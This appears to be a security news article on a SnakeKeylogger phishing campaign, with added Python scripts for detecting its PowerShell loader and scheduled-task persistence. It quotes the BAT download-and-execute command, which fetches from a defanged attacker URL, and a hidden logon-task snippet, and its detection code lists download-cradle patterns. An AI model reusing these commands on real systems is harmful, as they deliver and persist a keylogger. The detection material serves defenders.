Cyber Security News

SnakeKeylogger via Weaponized E-mails Leverages PowerShell to Exfiltrate Sensitive Data

Emerging from a recent wave of targeted campaigns, SnakeKeylogger has surfaced as a potent infostealer that capitalizes on PowerShell and social engineering.

The malware’s operators craft convincing spear-phishing e-mails under aliases such as “CPA-Payment Files,” impersonating reputable financial and research firms.

Recipients encounter ISO or ZIP attachments containing a seemingly innocuous BAT script. Once executed, this script downloads and launches a PowerShell payload designed to harvest keystrokes and system information before exfiltrating data to a remote server.

Gen Threat Labs analysts noted the malware’s seamless blend of legitimate Windows utilities and custom scripting for stealth and rapid deployment.

After opening the attachment, victims unwittingly activate a BAT file resembling the following snippet:

@echo off
REM -NoP (no profile) and -NonI (non-interactive) keep the session quiet, -W Hidden
REM suppresses the console window, and -Exec Bypass overrides the execution policy for
REM this process only. cmd.exe expands %TEMP% before powershell.exe is launched.
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://fxa.sabitaxt.com/mc55tP.ps1 -OutFile %TEMP%\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File %TEMP%\snake.ps1'}"

Nothing here is exploited. -ExecutionPolicy Bypass simply overrides the execution policy for that one process (the policy is a safety rail for the user, not a security boundary, and any user can override it), -WindowStyle Hidden suppresses the console window, and -NoProfile together with -NonInteractive keeps the session quiet, so SnakeKeylogger runs with no visible sign to the victim. These switches do not defeat PowerShell script block logging or AMSI, which still see the script content once it executes, so the command line itself, and in particular cmd.exe spawning powershell.exe with this combination of switches, is the first place to look for the chain.
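The switch combination and the download cradle in that BAT file are what a detection engineer would key on in process-creation telemetry. The following is an added example, not code from the article or from Gen Threat Labs: it normalises powershell.exe's abbreviated switches (the page's -NoP/-NonI/-W/-Exec spellings as well as the shorter -nop/-w 1/-ep forms other loaders use), separates the script body from the switches, and names the loader traits found in each event. The Sysmon Event ID 1 field names are an assumption about the log source, and the three sample events (including the placeholder example.invalid URL) are constructed.

```python
"""Triage Windows process-creation events for the BAT-to-PowerShell loader pattern.

Added example, not code from the article or Gen Threat Labs. Field names (Image,
ParentImage, CommandLine) follow Sysmon Event ID 1 as an assumption about the log
source; the sample events at the bottom are constructed, not real telemetry."""
import re

# powershell.exe accepts any unambiguous prefix of a switch (-nop, -noni, -w, -ec ...),
# so a prefix lookup over this ordered list resolves the short forms; -ep is a further
# spelling it accepts for -ExecutionPolicy.
SWITCHES = ["encodedcommand", "executionpolicy", "noprofile", "noninteractive",
            "windowstyle", "command", "file", "nologo", "noexit", "sta", "mta"]
ALIASES = {"ep": "executionpolicy"}
TAKES_VALUE = {"encodedcommand", "executionpolicy", "windowstyle", "file"}
CRADLE = re.compile(r"(invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
                    r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b)", re.I)
TEMP_PATH = re.compile(r"(%temp%|\$env:temp\b|\\temp\\)", re.I)
RELAUNCH = re.compile(r"start-process\s+['\"]?powershell", re.I)
SCRIPT_HOST_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def tokenize(cmdline):
    # Whitespace split honouring ' and "; the other quote kind inside a quoted run is kept
    # literally, so the nested '-NoP ... -File ...' argument of the loader stays one token.
    tokens, cur, quote = [], [], None
    for ch in cmdline:
        if quote and ch == quote:
            quote = None
        elif not quote and ch in "\"'":
            quote = ch
        elif not quote and ch.isspace():
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    return tokens + ["".join(cur)] if cur else tokens


def canonical_switch(name):
    name = name.lower()
    return ALIASES.get(name) or next((s for s in SWITCHES if s.startswith(name)), name)


def parse_powershell(cmdline):
    """Return {'switches': {canonical: value or True}, 'body': script text}."""
    toks = tokenize(cmdline)
    switches, body = {}, []
    i = 1 if toks and toks[0].lower().endswith(("powershell", "powershell.exe", "pwsh", "pwsh.exe")) else 0
    while i < len(toks):
        t = toks[i]
        if t[0] in "-/" and len(t) > 1:
            sw = canonical_switch(t[1:])
            if sw == "command":            # everything after -Command is script text
                body.extend(toks[i + 1:])
                break
            if sw in TAKES_VALUE and i + 1 < len(toks):
                switches[sw] = toks[i + 1]
                i += 2
                continue
            switches[sw] = True
        else:                              # bare trailing text is also run as a command
            body.append(t)
        i += 1
    return {"switches": switches, "body": " ".join(body)}


def loader_indicators(event):
    """Name every loader trait present in one process-creation event."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    parsed = parse_powershell(event["CommandLine"])
    sw, text = parsed["switches"], event["CommandLine"]
    checks = [
        ("script_host_parent", event["ParentImage"].lower().rsplit("\\", 1)[-1] in SCRIPT_HOST_PARENTS),
        ("hidden_window", str(sw.get("windowstyle", "")).lower() in ("hidden", "1")),  # Hidden == enum 1
        ("execution_policy_bypass", str(sw.get("executionpolicy", "")).lower() in ("bypass", "unrestricted")),
        ("no_profile", bool(sw.get("noprofile"))),
        ("non_interactive", bool(sw.get("noninteractive"))),
        ("encoded_command", "encodedcommand" in sw),
        ("download_cradle", bool(CRADLE.search(text))),
        ("temp_path", bool(TEMP_PATH.search(text))),
        ("spawns_second_powershell", bool(RELAUNCH.search(parsed["body"]))),
    ]
    return [name for name, hit in checks if hit]


def triage(events, threshold=4):
    """{event id: traits} for events showing at least `threshold` loader traits."""
    return {ev["id"]: hits for ev in events if len(hits := loader_indicators(ev)) >= threshold}


# Constructed sample events. cmd.exe expands %TEMP% before the child starts, so the
# logged command line shows the resolved path; the URL is a placeholder, not the IoC.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "bat-loader", "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r'''powershell -NoP -NonI -W Hidden -Exec Bypass -Command "& {iwr hxxp://example.invalid/stage2.ps1 -OutFile C:\Users\victim\AppData\Local\Temp\snake.ps1; Start-Process powershell -ArgumentList '-NoP -NonI -W Hidden -Exec Bypass -File C:\Users\victim\AppData\Local\Temp\snake.ps1'}"'''},
    {"id": "admin-script", "ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    {"id": "short-flags", "ParentImage": r"C:\Windows\System32\wscript.exe", "Image": PS,
     "CommandLine": r'''powershell -nop -w 1 -ep bypass -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.ps1', $env:TEMP + '\a.ps1')"'''},
]
```

Running triage(SAMPLE_EVENTS) flags the page's loader (eight traits) and the short-flag variant (six), while the scheduled inventory script only carries -NoProfile and stays below the threshold. The threshold is deliberately a count rather than a single signature: -Exec Bypass alone is common in administration, but a hidden, profile-less PowerShell spawned by cmd.exe that downloads into Temp and relaunches itself is the loader's shape regardless of URL or hash.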

The PowerShell script, once loaded, establishes persistence by creating scheduled tasks and registry entries, ensuring the malware survives reboots and avoids cursory incident response efforts.

Beyond initial delivery, SnakeKeylogger’s impact lies in its minimalist but efficient data collection routines. Upon activation, the script invokes Windows API functions to capture keystrokes, clipboard contents, and active window titles.

Collected information is batched and encoded before transmission to a command-and-control server.

Observed IoCs include BAT payload SHA256 hashes such as 3796e68... and the PowerShell script URL hxxp://fxa[.]sabitaxt[.]com/mc55tP.ps1, indicative of the ongoing campaign.

Infection Mechanism

SnakeKeylogger’s infection chain hinges on its two-stage loader. The initial BAT script runs PowerShell with -ExecutionPolicy Bypass, so no vulnerability is needed for the first stage to retrieve the core keylogger module from the operators’ server.

Within the PowerShell payload, the Add-Type cmdlet compiles C# source on the fly; that source declares P/Invoke signatures for Win32 functions such as user32!GetAsyncKeyState, which the script then polls to intercept keystrokes. In Windows PowerShell this compilation step spawns csc.exe and writes a temporary assembly under the user’s Temp directory, so csc.exe as a child of powershell.exe is both a forensic artifact and a detection signal in its own right.

Persistence is achieved via a scheduled task entry resembling:

# Action: a hidden PowerShell window running the dropped script from a directory standard users can write to
$Action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1'
# Trigger at every logon; -RunLevel Highest requests the user's full (elevated) token when the account is an administrator
Register-ScheduledTask -TaskName 'SystemUpdate' -Action $Action -Trigger (New-ScheduledTaskTrigger -AtLogon) -RunLevel Highest

This tactic reinstates the keylogger at each user login under a name (“SystemUpdate”) chosen to blend in with legitimate Windows maintenance tasks, which complicates detection by name alone. The task itself is the durable artifact, though: a task-creation event (Security Event 4698, where task auditing is enabled) whose action is powershell.exe with -WindowStyle Hidden and a -File path under a Temp directory, triggered at logon and requesting the highest run level, warrants an alert on its own, as does cmd.exe spawning powershell.exe with -Exec Bypass and -W Hidden. Continuous monitoring and timely updates to endpoint protection policies are recommended to counteract this evolving threat.
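The registration above is what the persistence hunt should match on, independent of the task name. The following is an added example, not code from the article or from Gen Threat Labs: it parses the Task Scheduler XML that Export-ScheduledTask emits and that Security Event 4698 carries in its TaskContent field, and names the traits of the SnakeKeylogger entry (logon or boot trigger, highest available run level, a script host as the action, a script path in a user-writable directory, a hidden window). The two task documents and the 4698-style event records are constructed; the XML declaration Windows writes is omitted so the strings parse directly.

```python
"""Triage scheduled-task registrations for the logon-trigger persistence pattern.

Added example, not code from the article or Gen Threat Labs. Input is the Task
Scheduler XML that Export-ScheduledTask emits and that Security Event 4698 carries in
its TaskContent field; both task documents below are constructed."""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"powershell.exe", "powershell", "pwsh.exe", "pwsh", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Directories a standard user can write to; a task that runs a script from one of
# them at every logon is the shape of the SnakeKeylogger entry above.
USER_WRITABLE = re.compile(r"(\\temp\\|\\appdata\\|\\programdata\\|\\users\\public\\)", re.I)
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+(hidden|1)\b", re.I)   # -WindowStyle Hidden / -w 1


def task_indicators(task_xml):
    """Name the persistence traits present in one Task Scheduler XML document."""
    root = ET.fromstring(task_xml)
    trig = root.find("t:Triggers", NS)
    triggers = [] if trig is None else [el.tag.rsplit("}", 1)[-1] for el in trig]
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS)
    hits = []
    if any(t in ("LogonTrigger", "BootTrigger") for t in triggers):
        hits.append("runs_at_logon_or_boot")
    if run_level == "HighestAvailable":
        hits.append("highest_available")
    for ex in root.iterfind("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS)
        if cmd.lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            hits.append("script_host_action")
        if USER_WRITABLE.search(cmd) or USER_WRITABLE.search(args):
            hits.append("user_writable_path")
        if HIDDEN_WINDOW.search(args):
            hits.append("hidden_window")
    return hits


def triage_task_events(events, threshold=3):
    """{TaskName: traits} for 4698-style events whose task shows >= threshold traits."""
    return {ev["TaskName"]: hits for ev in events
            if len(hits := task_indicators(ev["TaskContent"])) >= threshold}


# Constructed task documents. The first mirrors the Register-ScheduledTask call above;
# the second is a vendor updater of the kind that legitimately runs from Program Files.
SUSPICIOUS_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-WindowStyle Hidden -File C:\Windows\Temp\snake.ps1</Arguments>
  </Exec></Actions>
</Task>"""
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary>
    <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec>
    <Command>"C:\Program Files\ExampleVendor\Updater.exe"</Command>
    <Arguments>/quiet</Arguments>
  </Exec></Actions>
</Task>"""
SAMPLE_4698 = [{"TaskName": r"\SystemUpdate", "TaskContent": SUSPICIOUS_TASK},
               {"TaskName": r"\ExampleVendor\Updater", "TaskContent": BENIGN_TASK}]
```

triage_task_events(SAMPLE_4698) returns only \SystemUpdate, with all five traits; the updater task matches none. On a live host the same function can be fed the output of Export-ScheduledTask for every task under \ to baseline existing persistence rather than waiting for a new 4698 event, which is the check worth running after any suspected SnakeKeylogger delivery.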


Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.
